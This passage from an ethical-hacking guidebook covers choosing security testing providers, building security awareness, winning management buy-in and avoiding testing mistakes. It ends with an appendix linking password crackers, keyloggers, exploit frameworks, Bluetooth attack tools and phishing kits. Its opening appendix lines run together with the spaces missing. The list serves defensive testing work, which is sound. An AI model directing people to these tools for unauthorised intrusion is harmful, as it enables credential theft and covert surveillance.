Is your security provider on your side or a third-party vendor’s side? Is the provider trying to sell you products, or is the provider vendor neutral? Many providers might try to make a few more dollars off the deal by recommending products and services from vendors they partner with, which might not be necessary for your needs. Make sure that these potential conflicts of interest aren’t bad for your budget and your business.

What other IT or security services does the provider offer? Does the provider focus solely on security? Having an information security specialist do this testing for you is often better than working with an IT generalist organization. After all, would you hire a general corporate lawyer to help you with a patent, a family practitioner to perform surgery, or a handyman to rewire your house?

What are your provider’s hiring and termination policies? Look for measures the provider takes to minimize the chances that an employee will walk off with your sensitive information.

Does the provider understand your business needs? Have the provider repeat the list of your needs and put them in writing to make sure you’re both on the same page.

How well does the provider communicate? Do you trust the provider to keep you informed and follow up with you in a timely manner?

Do you know exactly who will perform the tests? Will one person do the testing, or will subject-matter experts focus on the different areas?

Does the provider have the experience to recommend practical and effective countermeasures to the vulnerabilities found? The provider shouldn’t just hand you a thin report and say, “Good luck with all that!” You need realistic solutions.

What are the provider’s motives? Do you get the impression that the provider is in business to make a quick buck off the services, with minimal effort and value added, or is the provider in business to build loyalty with you and establish a long-term relationship?

Finding a good organization to work with long-term will make your ongoing efforts much simpler. Ask for several references and sample sanitized deliverables (that is, reports that don’t contain sensitive information) from potential providers. If the organization can’t produce these without difficulty, look for another provider.

Your provider should have its own contract for you that includes mutual nondisclosure verbiage. Make sure you both sign this to help protect your organization.

Thinking about hiring a reformed hacker? Former hackers—I’m referring to the black hat hackers who have hacked into computer systems in the past and ended up serving time in prison—can be very good at what they do. Many people swear by hiring reformed hackers to do their testing. Others compare this to hiring the proverbial fox to guard the henhouse. If you’re thinking about bringing in a former (un)ethical hacker to test your systems, consider these issues:

Do you really want to reward malicious behavior with your organization’s business?

A hacker claiming to be “reformed” doesn’t mean he or she is. There could be deep-rooted psychological issues or character flaws you’re going to have to contend with. Buyer beware!

Information gathered and accessed during security assessments is some of the most sensitive information your organization possesses. If this information gets into the wrong hands—even ten years down the road—it could be used against you. Some hackers and reformed criminals hang out in tight social groups. You might not want your information shared in their circles.

That said, everyone deserves a chance to explain what happened in the past. Zero tolerance is senseless. Listen to his or her story and use common-sense discretion as to whether you trust the person to help you. The supposed black hat hacker actually might have been a gray hat hacker or a misguided white hat hacker who fits well in your organization.

Instilling a Security-Aware Mindset

Your network users are often your first and last line of defense. Make sure your ethical hacking efforts and the money spent on your information security initiatives aren’t wasted because a simple employee slip-up gave a malicious attacker the keys to the kingdom.

The following elements can help establish a security-aware culture in your organization:

Make security awareness and ongoing training an active process among all employees and users on your network, including management and contractors. One-time training such as when employees are initially hired is not enough. Awareness and training must be periodic and consistent to ensure your security messages are kept at the top of people’s minds.

Treat awareness and training programs as a long-term business investment. Security awareness programs don’t have to be expensive. You can buy posters, mouse pads, screen savers, pens, and sticky notes to help keep security on everyone’s mind. Some creative solutions vendors are Greenidea, Inc. (www.greenidea.com), Security Awareness, Inc. (www.securityawareness.com), and my favorite (because of its founder, Winn Schwartau, who’s a hilarious guy who’s not afraid to tell it like it is) The Security Awareness Company (www.thesecurityawarenesscompany.com).

Get the word on security out to management! If you keep members of management in the dark on what you’re doing, they’ll likely never be on your side. I cover getting security buy-in in Chapter 20.

Align your security message with your audience and keep it as nontechnical as possible. The last thing you want to do is unload a bunch of geek-speak onto people who have no clue what you’re talking about. You’ll end up with the opposite of the effect you’re going for. Put your messages in terms of each group you’re speaking to: how security impacts them and how they can help.

Lead by example. Show that you take security seriously and offer evidence that helps prove that everyone else should, too.

If you can get the ear of management and users and put forth enough effort to make security a priority day after day, you can help shape your organization’s culture. It takes work but it can provide security value beyond your wildest imagination. I’ve seen the difference it makes!

Keeping Up with Other Security Efforts

Ethical hacking via ongoing security assessment is not the be-all and end-all solution to information security. It will not guarantee security, but it’s certainly a great start. This testing must be integrated as part of an overall information security program that includes

Higher-level information risk assessments

Strong security policies and standards that are enforced and properly adhered to

Solid incident response and business continuity plans

Effective security awareness and training initiatives

These efforts might require hiring more staff or outsourcing more security help as well.

Don’t forget about formal training for yourself and any colleagues who are helping you. You have to educate yourself consistently to stay on top of the security game. There are great conferences, seminars, and online resources for this that I outline in the Appendix.

Part VII

The Part of Tens

Visit www.dummies.com/extras/hacking for great Dummies content online.

In this part…

Well, here’s the end of the road, so to speak. In this part, I’ve compiled top-ten lists of what I believe are the absolute critical success factors to make your security testing—and information security in general—work in your organization. Bookmark, dog-ear, or do whatever you need to do with these pages so you can refer to them in the future. This is the meat of what you need to know about information security, compliance, and managing information risks—even more so than the technical tests and countermeasures I’ve covered thus far. Read it, study it, and make it happen. You can do it!

In addition, the Appendix contains a listing of my favorite security testing tools and resources that I’ve covered (and more), broken down into various categories for easy reference.

Chapter 20

Ten Tips for Getting Security Buy-In

Dozens of key steps exist for obtaining the buy-in and sponsorship that you need to support your security testing efforts. In this chapter, I describe the top ten I find to be the most effective.

Cultivate an Ally and a Sponsor

Although recent breaches and compliance pressures are helping push things along, selling security to management isn’t something you want to tackle alone. Get an ally—preferably your direct manager or someone at that level or higher in the organization. Choose someone who understands the value of security testing as well as information security in general. Although this person might not be able to speak for you directly, he or she can be seen as an unbiased sponsor and can give you more credibility.

Don’t Be a FUDdy Duddy

Sherlock Holmes said, “It is a capital mistake to theorize before one has data.” To make a good case for information security and the need for vulnerability testing, support your case with relevant data. However, don’t blow stuff out of proportion for the sake of stirring up fear, uncertainty, and doubt (FUD). Managers worth their salt can see right through that. Focus on educating management with practical advice. Rational fears proportional to the threat are fine. Just don’t take the Chicken Little route, claiming that the sky is falling with everything all the time. That’s tiring to those outside of IT and security and will only hurt you over the long haul.

Demonstrate How the Organization Can’t Afford to Be Hacked

Show how dependent the organization is on its information systems. Create what-if scenarios—sort of a business impact assessment—to show what can happen, how the organization’s reputation can be damaged, and how long the organization can go without using the network, computers, and data. Ask upper-level managers what they would do without their computer systems and IT personnel—or what they’d do if sensitive business or client information was compromised. Show real-world anecdotal evidence of breaches, including malware, physical security, and social engineering issues, but be positive about it. Don’t approach management negatively with FUD. Rather, keep them informed on serious security happenings. Odds are they’re already reading about these things in major business magazines and newspapers. Figure out what you can do to apply those stories to your situation. To help management relate, find stories regarding similar businesses, competitors, or industries. (A good resource is the Privacy Rights Clearinghouse Chronology of Data Breaches at www.privacyrights.org/data-breach.) The annual Verizon Data Breach Investigations Report (www.verizonenterprise.com/DBIR), among others, is also a great resource. Let the facts speak for themselves.

Google and Bing are great tools to find practically everything you need regarding information security breaches.

Show management that the organization does have what a hacker wants. A common misconception among those ignorant about information security threats and vulnerabilities is that their organization or network is not really at risk. Be sure to point out the potential costs from damage caused by hacking, such as:

Missed opportunity costs

Exposure of intellectual property

Liability issues

Legal costs and judgments

Compliance-related fines

Criminal punishments

Lost productivity

Clean-up time and incident response costs

Replacement costs for lost, exposed, or damaged information or systems

Costs of fixing a tarnished reputation (it can take a lifetime to build a reputation and mere minutes for it to go away)

Outline the General Benefits of Security Testing

In addition to the potential costs listed in the preceding section, talk about how proactive testing can help find security vulnerabilities in information systems that normally might be overlooked. Tell management that security testing in the context of ethical hacking is a way of thinking like the bad guys so that you can protect yourself from them—the “know your enemy” mindset from Sun Tzu’s The Art of War.

Show How Security Testing Specifically Helps the Organization

Document benefits that support the overall business goals:

Demonstrate how security doesn’t have to be ultra-expensive and can save the organization money in the long run.

Security is much easier and cheaper to build in up front than to add on later. Security doesn’t have to be inconvenient or hinder productivity if it’s done properly.

Discuss how new products or services can be offered for a competitive advantage if secure information systems are in place.

State and federal privacy and security regulations are met.

Business partner and customer requirements are satisfied.

Managers and the company come across as business-worthy in the eyes of customers and business partners. A solid security testing program and the appropriate remediation process show that the organization is protecting sensitive customer and business information.

Outline the compliance and audit benefits of in-depth security testing.

Get Involved in the Business

Understand the business—how it operates, who the key players are, and what politics are involved:

Go to meetings to see and be seen. This can help prove that you’re concerned about the business. Be a person of value who’s interested in contributing to the business.

Know your opposition. Again, use the “know your enemy” mentality—if you understand the people you’re dealing with internally, along with their potential objections, buy-in is much easier to get. This goes not only for management but also your peers and practically every user on the network.

Establish Your Credibility

I think one of the biggest impediments holding IT and security professionals back is people not “getting” us. Your credibility is all you’ve got. Focus on these four characteristics to build it and maintain it:

Be positive about the organization and prove that you really mean business. Your attitude is critical.

Empathize with managers and show them that you understand the business side and what they’re up against.

Determine ways that you can help others get what they need.

To create any positive business relationship, you must be trustworthy. Build that trust over time, and selling security will be much easier.

Speak on Management’s Level

As cool as it sounds, no one outside of IT and security is really that impressed with techie talk. One of the best ways to limit or reduce your credibility is to communicate with everyone in this fashion. Talk in terms of the business. Talk in terms of what your specific audience needs to hear. Otherwise, odds are great that it’ll go right over their heads.

I’ve seen countless IT and security professionals lose upper-level managers as soon as they start speaking. A megabyte here; stateful inspection there; packets, packets everywhere! Bad idea. Relate security issues to everyday business processes, job functions, and overall goals. Period.

Show Value in Your Efforts

Here’s where the rubber meets the road. If you can demonstrate that what you’re doing offers business value on an ongoing basis, you can maintain a good pace and not have to constantly plead to keep your security testing program going. Keep these points in mind:

Document your involvement in IT and information security, and create ongoing reports for management regarding the state of security in the organization. Give management examples of how the organization’s systems are, or will be, secured from attacks.

Outline tangible results as a proof of concept. Show sample vulnerability assessment reports you’ve run on your systems or from the security tool vendors.

Treat doubts, concerns, and objections by management and users as requests for more information. Find the answers and go back armed and ready to prove your own worthiness.

Be Flexible and Adaptable

Prepare yourself for skepticism and rejection. Even as hot as security is today, it still happens, especially with upper-level managers such as CFOs and CEOs, who are often disconnected from IT and security in the organization. A middle-management structure that lives to create complexity is a party to the problem as well.

Don’t get defensive. Security is a long-term process, not a short-term product or single assessment. Start small—use a limited amount of resources, such as budget, tools, and time, and then build the program over time.

Studies have found that new ideas presented casually and without pressure are considered and have a higher rate of acceptance than ideas that are forced on people under a deadline. Just as with a spouse or colleagues at work, if you focus on and fine-tune your approach—at least as much as you focus on the content of what you’re going to say—you can often get people on your side, and in return, get a lot more accomplished with your security program.

Chapter 21

Ten Reasons Hacking Is the Only Effective Way to Test

Approaching your security testing from the perspective of ethical hacking is not just for fun or show. For numerous business reasons, it’s the only effective way to find the security vulnerabilities that matter in your organization.

The Bad Guys Think Bad Thoughts, Use Good Tools, and Develop New Methods

If you’re going to keep up with external attackers and malicious insiders, you have to stay current on the latest attack methods and tools that they’re using. I cover some of the latest tricks, techniques, and tools throughout this book.

IT Governance and Compliance Are More than High-Level Checklist Audits

With all the government and industry regulations in place, your business likely doesn’t have a choice in the matter. You have to address security. The problem is that being compliant with these laws and regulations doesn’t automatically mean your network and information are secure. The Payment Card Industry Data Security Standard (PCI DSS) comes to mind here. There are countless businesses running their vulnerability scans and answering their self-assessment questionnaires assuming that that’s all that’s needed to manage their information security programs. You have to take off the checklist audit blinders and move from a compliance-centric approach to a threat-centric approach. Using the tools and techniques covered in this book enables you to dig deeper into your business’s true vulnerabilities.

Hacking Complements Audits and Security Evaluations

No doubt, someone in your organization understands higher-level security audits better than this ethical hacking stuff. However, if you can sell that person on more in-depth security testing and integrate it into existing security initiatives (such as internal audits and compliance spot checks), the auditing process can go much deeper and improve your outcomes. Everyone wins.

Customers and Partners Will Ask, ‘How Secure Are Your Systems?’

Many businesses now require in-depth security assessments of their business partners. The same goes for certain customers. The bigger companies almost always want to know how secure their information is while being processed or stored in your environment. You cannot rely on data center audit reports such as the commonly-referenced SSAE 16 Service Organizational Controls (SOC) 2 standard for data center security audits. The only way to definitively know where things stand is to use the methods and tools I cover in this book.

The Law of Averages Works Against Businesses

Information systems are becoming more complex by the day. Literally. With the cloud, virtualization, and mobile being front and center in most enterprises, it’s getting more and more difficult for IT and security managers to keep up. It’s just a matter of time before these complexities work against you and in the bad guys’ favor. A criminal hacker needs to find only one critical flaw to be successful. You have to find them all. If you’re going to stay informed and ensure that your critical business systems and the sensitive information they process and store stay secure, you have to look at things with a malicious mindset and do so periodically and consistently over time, not just once every now and then.

Security Assessments Improve the Understanding of Business Threats

You can say passwords are weak or patches are missing, but actually exploiting such flaws and showing the outcome are quite different matters. There’s no better way to prove there’s a problem and motivate management to do something about it than by showing the outcomes of the testing methods that I outline in this book.

If a Breach Occurs, You Have Something to Fall Back On

In the event a malicious insider or external attacker still breaches your security, your business is sued, or your business falls out of compliance with laws or regulations, the management team can at least demonstrate that it was performing its due care to uncover security risks through the proper testing. A related area that can be problematic is knowing about a problem and not fixing it. The last thing you need is a lawyer and his expert witness pointing out how your business was lax in the area of information security testing or follow-through. That’s a road you don’t want to go down.

In-Depth Testing Brings Out the Worst in Your Systems

Someone walking around doing a self-assessment or high-level audit can find security “best practices” you’re missing, but he isn’t going to find most of the security flaws that in-depth security vulnerability and penetration testing is going to uncover. The testing methods I outline in this book will bring out the warts and all.

Combining the Best of Penetration Testing and Vulnerability Assessments Is What You Need

Penetration testing is rarely enough to find everything in your systems because the scope of traditional penetration testing is simply too limited. The same goes for vulnerability assessments, especially those that mostly involve basic vulnerability scans. When you combine both, you get the most bang for your buck.

Proper Testing Can Uncover Weaknesses That Might Go Overlooked for Years

Performing the proper security assessments not only uncovers technical, physical, and human weaknesses, but it can also reveal problems with IT and security operations, such as patch management, change management, and lack of user awareness, which may not be found otherwise or until it’s too late.

Chapter 22

Ten Deadly Mistakes

Making the wrong choices in your security testing can wreak havoc on your work, possibly even your career. In this chapter, I discuss ten potential pitfalls to be keenly aware of when performing your security assessment work.

Not Getting Prior Approval

Getting documented approval in advance, such as an e-mail, an internal memo, or a formal contract for your ethical hacking efforts—whether it’s from management or from your client—is an absolute must. It’s your “Get Out of Jail Free” card.

Allow no exceptions here—especially when you’re doing work for clients: Make sure you get a signed copy of this document for your files to make sure you’re protected.

Assuming You Can Find All Vulnerabilities During Your Tests

So many security vulnerabilities exist—known and unknown—that you won’t find them all during your testing. Don’t make any guarantees that you’ll find all the security vulnerabilities in a system. You’ll be starting something that you can’t finish.

Stick to the following tenets:

Be realistic.

Use good tools.

Get to know your systems and practice honing your techniques.

I cover each of these in various depths in Chapters 5 through 16.

Assuming You Can Eliminate All Security Vulnerabilities

When it comes to networks, computers, and applications, 100 percent, ironclad security is not attainable. You can’t possibly prevent all security vulnerabilities, but you’ll do fine if you uncover the low-hanging fruit that creates most of the risk and accomplish these tasks:

Follow solid practices—the security essentials that have been around for decades.

Patch and harden your systems.

Apply reasonable security countermeasures where you can based on your budget and your business needs.

Many chapters, such as the operating system chapters in Part IV, cover these areas. It’s also important to remember that you’ll have unplanned costs. You may find lots of security problems and will need the budget to plug the holes. Perhaps you now have a due care problem on your hands and have to fix the issues uncovered. This is why you need to approach information security from a risk perspective and have all the right people on board.

Performing Tests Only Once

Security assessments are a mere snapshot of your overall state of security. New threats and vulnerabilities surface continually, so you must perform these tests periodically and consistently to make sure you keep up with the latest security defenses for your systems. Develop both short- and long-term plans for carrying out your security tests over the next few months and next few years.

Thinking You Know It All

Even though some in the field of IT would beg to differ, no one working in IT or information security knows everything about this subject. Keeping up with all the software versions, hardware models, and emerging technologies, not to mention the associated security threats and vulnerabilities, is impossible. True IT and information security professionals know their limitations—that is, they know what they don’t know. However, they do know where to get answers through the myriad of online resources such as those I’ve listed in the Appendix.

Running Your Tests Without Looking at Things from a Hacker’s Viewpoint

Think about how a malicious outsider or rogue insider can attack your network and computers. Get a fresh perspective and try to think outside the proverbial box about how systems can be taken offline, information can be stolen, and so forth.

Study criminal and hacker behaviors and common hack attacks so you know what to test for. I’m continually blogging about this subject at http://securityonwheels.com/blog. Check out the Appendix for other trusted resources that can help you in this area.

Not Testing the Right Systems

Focus on the systems and information that matter most. You can hack away all day at a standalone desktop running Windows XP or at a training room printer with nothing of value, but does that do any good? Probably not. But you never know. Your biggest risks might be on the seemingly least critical system. Focus on what’s urgent and important.

Not Using the Right Tools

Without the right tools for the task, getting anything done without driving yourself nuts is impossible. It’s no different than working around the house, on your car, or in your garden. Good tools are an absolute must. Download the free and trial-version tools I mention throughout this book and in the Appendix. Buy commercial tools when you can—they’re usually worth every penny. No one security tool does it all, though.

Building your toolbox and getting to know your tools well will save you gobs of effort, you’ll impress others with your results, and you’ll help minimize your business’s risks.

Pounding Production Systems at the Wrong Time

One of the best ways to tick off your manager or lose your client’s trust is to run security tests against production systems when everyone is using them. This is especially true for those running older, more feeble operating systems and applications. If you try to test systems at the wrong time, expect that the critical ones may be negatively impacted at the absolute worst moment. Make sure you know the best time to perform your testing. It might be in the middle of the night. (I never said information security testing was easy!) This might be reason to justify using security tools and other supporting utilities that can help automate certain tasks, such as vulnerability scanners that allow you to run scans at a certain time.

Outsourcing Testing and Not Staying Involved

Outsourcing is great, but you must stay involved throughout the entire process. Don’t hand over the reins of your security testing to a third-party consultant or a managed service provider without following up and staying on top of what’s taking place. You won’t be doing your manager or clients any favors by staying out of the third-party vendors’ hair. Get in their hair, unless of course, it’s a bald person like me. But you know what I mean. You cannot outsource accountability, so stay in touch!

Appendix

ToolsandResourcesTostayup-to-datewiththelatestandgreatestsecuritytestingtoolsandresources,youneedtoknowwheretoturn.Thisappendixcontainsmyfavoritesecuritysites,tools,resources,andmorethatyoucanbenefitfrominyourongoingsecurityassessmentprogram.

Thisbook’sonlineCheatSheetcontainslinkstoalltheonlinetoolsandresourceslistedinthisappendix.Checkitoutatwww.dummies.com/cheatsheet/hacking.

AdvancedMalwareBit9+CarbonBlackSecurityPlatform—www.bit9.com/solutions

DamballaFailsafe—www.damballa.com/solutions/damballa_failsafe.php

BluetoothBlooover—http://trifinite.org/trifinite_stuff_blooover.html

BlueScanner—http://sourceforge.net/projects/bluescanner

Bluesnarfer—www.alighieri.org/tools/bluesnarfer.tar.gz

BlueSniperrifle—www.tomsguide.com/us/how-to-bluesniper-pt1,review-408.html

BTScannerforXP—www.pentest.co.uk/src/btscanner_1_0_0.zip

CarWhisperer—http://trifinite.org/trifinite_stuff_carwhisperer.html

Smurf—www.gatefold.co.uk/smurf

CertificationsCertifiedEthicalHacker—www.eccouncil.org/CEH.htm

CertifiedInformationSecurityManager—www.isaca.org/Certification/CISM-Certified-Information-Security-Manager/Pages/default.aspx

CertifiedInformationSystemsSecurityProfessional—www.isc2.org/cissp/default.aspx

CertifiedWirelessSecurityProfessional—www.cwnp.com/certifications/cwsp

CompTIASecurity+—http://certification.comptia.org/getCertified/certifications/security.aspx

SANSGIAC—www.giac.org

Databases

Advanced Office Password Recovery — www.elcomsoft.com/aopr.html

Advanced SQL Password Recovery — www.elcomsoft.com/asqlpr.html

AppDetectivePro — www.trustwave.com/Products/Database-Security/AppDetectivePRO

ElcomSoft Distributed Password Recovery — www.elcomsoft.com/edpr.html

Idera — www.idera.com

Microsoft SQL Server 2008 Management Studio Express — www.microsoft.com/en-us/download/details.aspx?id=7593

Nexpose — www.rapid7.com/vulnerability-scanner.jsp

Pete Finnigan's listing of Oracle scanning tools — www.petefinnigan.com/tools.htm

QualysGuard — www.qualys.com

SQLPing3 — www.sqlsecurity.com/downloads

Denial of Service Protection

CloudFlare — www.cloudflare.com

DOSarrest — www.dosarrest.com

Incapsula — www.incapsula.com

Exploits

Metasploit — www.metasploit.com

Offensive Security's Exploit Database — www.exploit-db.com

Pwnie Express — https://pwnieexpress.com

General Research Tools

AFRINIC — www.afrinic.net

APNIC — www.apnic.net

ARIN — http://whois.arin.net/ui

Bing — www.bing.com

DNSstuff — www.dnsstuff.com

DNSTools — www.dnstools.com

The File Extension Source — http://filext.com

Google — www.google.com

Google advanced operators — www.googleguide.com/advanced_operators.html

Government domains — www.dotgov.gov/portal/web/dotgov/whois

Hoover's business information — www.hoovers.com

LACNIC — www.lacnic.net

Netcraft's What's that site running? — http://netcraft.com

RIPE Network Coordination Centre — https://apps.db.ripe.net/search/query.html

Switchboard.com — www.switchboard.com

theHarvester — https://code.google.com/p/theharvester

United States Patent and Trademark Office — www.uspto.gov

USSearch.com — www.ussearch.com

United States Securities and Exchange Commission — www.sec.gov/edgar.shtml

Whois — www.whois.net

WhatIsMyIP — www.whatismyip.com

Yahoo! Finance — http://finance.yahoo.com

Zabasearch — www.zabasearch.com

Hacker Stuff

2600 The Hacker Quarterly — www.2600.com

Hacker T-shirts, equipment, and other trinkets — www.thinkgeek.com

Hakin9 — http://hakin9.org

(IN)SECURE Magazine — www.net-security.org/insecuremag.php

Phrack — www.phrack.org

The Jargon File — www.jargon.8hz.com

Keyloggers

KeyGhost — www.keyghost.com

SpectorSoft — www.spectorsoft.com

Laws and Regulations

Computer Fraud and Abuse Act — www.fas.org/sgp/crs/misc/RS20830.pdf

Digital Millennium Copyright Act (DMCA) — www.eff.org/issues/dmca

Gramm-Leach-Bliley Act (GLBA) Safeguards Rule — www.ftc.gov/tips-advice/business-center/privacy-and-security/gramm-leach-bliley-act

Health Insurance Portability and Accountability Act (HIPAA) Security Rule — www.hhs.gov/ocr/privacy/hipaa/understanding/srsummary.html

Payment Card Industry Data Security Standard (PCI DSS) — www.pcisecuritystandards.org/security_standards/index.php

United States Security Breach Notification Laws — www.ncsl.org/research/telecommunications-and-information-technology/security-breach-notification-laws.aspx

Linux

BackTrack Linux — www.backtrack-linux.org

GFI LanGuard — www.gfi.com/network-security-vulnerability-scanner

Kali Linux — www.kali.org

Linux Security Auditing Tool (LSAT) — http://usat.sourceforge.net

Nexpose — www.rapid7.com/vulnerability-scanner.jsp

QualysGuard — www.qualys.com

THC-Amap — www.thc.org/thc-amap

Tiger — www.nongnu.org/tiger

Various tools at SourceForge — http://sourceforge.net

Live Toolkits

Comprehensive listing of live bootable Linux toolkits — www.livecdlist.com

Kali Linux — www.kali.org

Knoppix — http://knoppix.net

Network Security Toolkit — www.networksecuritytoolkit.org

Security Tools Distribution — http://s-t-d.org

Log Analysis

ArcSight Logger — www8.hp.com/us/en/software-solutions/arcsight-logger-log-management/index.html

GFI EventsManager — www.gfi.com/eventsmanager

Messaging

Brutus — www.hoobie.net/brutus

Cain & Abel — www.oxid.it/cain.html

DNSstuff relay checker — www.dnsstuff.com

EICAR Anti-Virus test file — www.eicar.org/anti_virus_test_file.htm

GFI e-mail security test — www.gfi.com/pages/email-security.asp

mailsnarf — www.monkey.org/~dugsong/dsniff

theHarvester — https://github.com/laramies/theHarvester

smtpscan — www.freshports.org/security/smtpscan

Miscellaneous

3M Privacy Filters — www.shop3m.com/3m-privacy-filters.html

7-Zip — www.7-zip.org

SmartDraw — www.smartdraw.com

Visio — http://visio.microsoft.com/en-us/preview/default.aspx

WinZip — www.winzip.com

Mobile

BitLocker whitepapers — www.principlelogic.com/bitlocker.html

Checkmarx CxDeveloper — www.checkmarx.com

ElcomSoft Forensic Disk Decryptor — www.elcomsoft.com/efdd.html

ElcomSoft's Phone Breaker — www.elcomsoft.com/eppb.html

ElcomSoft System Recovery — www.elcomsoft.com/esr.html

iOS Forensic Toolkit — www.elcomsoft.com/eift.html

Ophcrack — http://ophcrack.sourceforge.net

Oxygen Forensic Suite — www.oxygen-forensic.com

Passware Kit Forensic — www.lostpassword.com/kit-forensic.htm

Veracode — www.veracode.com

Microsoft BitLocker Administration and Monitoring — https://technet.microsoft.com/en-us/windows/hh826072.aspx

Networks

Arpwatch — http://linux.maruhn.com/sec/arpwatch.html

Blast — www.mcafee.com/us/downloads/free-tools/blast.aspx

Cain & Abel — www.oxid.it/cain.html

CommView — www.tamos.com/products/commview

dsniff — www.monkey.org/~dugsong/dsniff

Essential NetTools — www.tamos.com/products/nettools

Fortinet — www.fortinet.com

Getif — www.wtcs.org/snmp4tpc/getif.htm

GFI LanGuard — www.gfi.com/network-security-vulnerability-scanner

IKECrack — http://ikecrack.sourceforge.net

MAC address vendor lookup — https://regauth.standards.ieee.org/standards-ra-web/pub/view.html#registries

Nessus vulnerability scanner — www.tenable.com/products/nessus

Netcat — http://netcat.sourceforge.net

netfilter/iptables — www.netfilter.org

NetResident — www.tamos.com/products/netresident

NetScanTools Pro — www.netscantools.com

Nping — https://nmap.org/nping

Nexpose — www.rapid7.com/products/nexpose/compare-downloads.jsp

Nmap port scanner — http://nmap.org

NMapWin — http://sourceforge.net/projects/nmapwin

OmniPeek — www.savvius.com/products/overview/omnipeek_family/omnipeek_network_analysis

Port list — www.iana.org/assignments/service-names-port-numbers/service-names-port-numbers.txt

Port number lookup — www.cotse.com/cgi-bin/port.cgi

PortSentry — http://sourceforge.net/projects/sentrytools

PromiscDetect — http://ntsecurity.nu/toolbox/promiscdetect

QualysGuard vulnerability scanner — www.qualys.com

SoftPerfect Network Scanner — www.softperfect.com/products/networkscanner

SMAC MAC address changer — www.klcconsulting.net/smac

SNARE — www.intersectalliance.com/projects/Snare

sniffdet — http://sniffdet.sourceforge.net

SonicWALL — www.sonicwall.com

Synful Knock Scanner — http://talosintel.com/scanner

TamoSoft Essential NetTools — www.tamos.com/products/nettools

Traffic IQ Professional — www.idappcom.com

UDPFlood — www.mcafee.com/us/downloads/free-tools/udpflood.aspx

WhatIsMyIP — www.whatismyip.com

Wireshark — www.wireshark.org

Password Cracking

Advanced Archive Password Recovery — www.elcomsoft.com/archpr.html

BIOS passwords — http://labmice.techtarget.com/articles/BIOS_hack.htm

BitLocker security whitepapers — www.principlelogic.com/bitlocker.html

Brutus — www.hoobie.net/brutus

Cain & Abel — www.oxid.it/cain.html

Crack — ftp://coast.cs.purdue.edu/pub/tools/unix/pwdutils/crack

Default vendor passwords — www.cirt.net/passwords

Dictionary files and word lists:

ftp://ftp.cerias.purdue.edu/pub/dict

https://packetstormsecurity.org/Crackers/wordlists

www.outpost9.com/files/WordLists.html

eBlaster and Spector Pro — www.spectorsoft.com

ElcomSoft Distributed Password Recovery — www.elcomsoft.com/edpr.html

ElcomSoft Forensic Disk Decryptor — www.elcomsoft.com/efdd.html

ElcomSoft System Recovery — www.elcomsoft.com/esr.html

Invisible KeyLogger Stealth — www.amecisco.com/iks.htm

John the Ripper — www.openwall.com/john

KeyGhost — www.keyghost.com

LastPass — https://lastpass.com

NetBIOS Auditing Tool — www.securityfocus.com/tools/543

NIST Guide to Enterprise Password Management — http://csrc.nist.gov/publications/drafts/800-118/draft-sp800-118.pdf

NTAccess — www.mirider.com/ntaccess.html

ophcrack — http://ophcrack.sourceforge.net

Oxygen Forensic Suite — www.oxygen-forensic.com

Pandora — www.nmrc.org/project/pandora

Passware Kit Forensic — www.lostpassword.com/kit-forensic.htm

Password Safe — http://passwordsafe.sourceforge.net

Proactive Password Auditor — www.elcomsoft.com/ppa.html

Proactive System Password Recovery — www.elcomsoft.com/pspr.html

Pwdump3 — www.openwall.com/passwords/microsoft-windows-nt-2000-xp-2003-vista-7

RainbowCrack — http://project-rainbowcrack.com

Rainbow tables — http://rainbowtables.shmoo.com

SQLPing3 — www.sqlsecurity.com/downloads

THC-Hydra — www.thc.org/thc-hydra

WinHex — www.winhex.com

Patch Management

Debian Linux Security Alerts — www.debian.org/security

Dell KACE Systems Management Appliance — http://software.dell.com/products/kace-k1000-systems-management-appliance/patch-management-security.aspx

Ecora Patch Manager — www.ecora.com/ecora/products/patchmanager.asp

GFI LanGuard — www.gfi.com/network-security-vulnerability-scanner

IBM BigFix — www-03.ibm.com/security/bigfix

KDE Software Updater — https://en.opensuse.org/System_Updates

Lumension Patch and Remediation — www.lumension.com/vulnerability-management/patch-management-software.aspx

ManageEngine — www.manageengine.com/products/desktop-central/linux-management.html

Microsoft Security TechCenter — https://technet.microsoft.com/en-us/security/default.aspx

Shavlik Patch — www.shavlik.com/products/patch

Slackware Linux Security Advisories — www.slackware.com/security

Windows Server Update Services from Microsoft — https://technet.microsoft.com/en-us/windowsserver/bb332157.aspx

Security Education and Learning Resources

Kevin Beaver's information security articles, whitepapers, webcasts, podcasts, and screencasts — www.principlelogic.com/resources.html

Kevin Beaver's Security On Wheels information security audio programs — http://securityonwheels.com

Kevin Beaver's Security On Wheels blog — http://securityonwheels.com/blog

Kevin Beaver's Twitter page — https://twitter.com/kevinbeaver

Security Methods and Models

Open Source Security Testing Methodology Manual — www.isecom.org/research/osstmm.html

OWASP — www.owasp.org

SecurITree — www.amenaza.com

The Open Group's FAIR Risk Taxonomy — www.opengroup.org/subjectareas/security/risk

Social Engineering and Phishing

CheckShortURL — www.checkshorturl.com

LUCY — http://phishing-server.com

Simple Phishing Toolkit — https://github.com/sptoolkit/sptoolkit

Social-Engineer Toolkit — www.trustedsec.com/social-engineer-toolkit

Where Does This Link Go? — http://wheredoesthislinkgo.com

Source Code Analysis

Checkmarx — www.checkmarx.com

Statistics

Privacy Rights Clearinghouse Chronology of Data Breaches — www.privacyrights.org/data-breach

Verizon Data Breach Investigations Report — www.verizonenterprise.com/DBIR

Storage

Effective File Search — www.sowsoft.com/search.htm

FileLocator Pro — www.mythicsoft.com

Identity Finder — www.identityfinder.com

System Hardening

Bastille Linux Hardening Program — http://bastille-linux.sourceforge.net

Center for Internet Security Benchmarks — www.cisecurity.org

Deep Freeze Enterprise — www.faronics.com/products/deep-freeze/enterprise

Fortres 101 — www.fortresgrand.com

Imperva — www.imperva.com/products/databasesecurity

Linux Administrator's Security Guide — www.seifried.org/lasg

Microsoft Security Compliance Manager — https://technet.microsoft.com/en-us/library/cc677002.aspx

ServerDefender — www.port80software.com/products/serverdefender

Symantec PGP — www.symantec.com/products-solutions/families/?fid=encryption

WinMagic — www.winmagic.com

User Awareness and Training

Awareity MOAT — www.awareity.com

Dogwood Management Partners Security Posters — www.securityposters.net

Greenidea Visible Statement — www.greenidea.com

Interpact, Inc. Awareness Resources — www.thesecurityawarenesscompany.com

Managing an Information Security and Privacy Awareness and Training Program by Rebecca Herold (Auerbach) — www.amazon.com/Managing-Information-Security-Awareness-Training/dp/0849329639

Peter Davis & Associates training services — www.pdaconsulting.com/services.htm

Security Awareness, Inc. — www.securityawareness.com

Voice over IP

Cain & Abel — www.oxid.it/cain.html

CommView — www.tamos.com/products/commview

Listing of various VoIP tools — www.voipsa.org/Resources/tools.php

